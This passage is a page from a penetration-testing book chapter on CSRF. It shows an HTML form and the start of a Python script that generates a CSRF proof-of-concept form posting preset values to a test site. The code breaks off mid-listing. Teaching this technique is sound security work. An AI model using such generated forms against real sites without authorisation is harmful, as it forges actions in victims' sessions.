Page 117 - Hands-On Bug Hunting for Penetration Testers
CSRF and Insecure Session Authentication Chapter 6
Here's the result of those additional changes:

    <html>
     <form>
      <input name="fname" type="text"/>
      <input name="lname" type="text"/>
      <input name="nick" type="text"/>
      <input type="submit" value="submit"/>
     </form>
    </html>

To take this further, we need to extend our use of attributes, and finally use the other
variables (such as action and method) we defined earlier. We can do that while also
adding a label tag for each appropriate input field.
We can also extend our initial data structure to accommodate some changes. Let's say we
want to add a value attribute to each input (as we have in our other PoC). We can do that
simply by adding an extra field in the dictionary for each form field.
Here's what it looks like when we put it all together:

    #!/usr/bin/env python

    from bs4 import BeautifulSoup

    def generate_poc():
        method = "POST"
        encoding_type = "application/x-www-form-urlencoded"
        action = "http://webscantest.com/crosstraining/aboutyou.php"
        fields = [
            {
                "type": "text",
                "name": "fname",
                "label": "fname",
                "value": "William"
            },
            {
                "type": "text",
                "name": "lname",
                "label": "lname",
                "value": "Mandella"
            },
            {
                "type": "text",
                "name": "nick",
                "label": "nick",
                "value": "Major Mandella"
            },

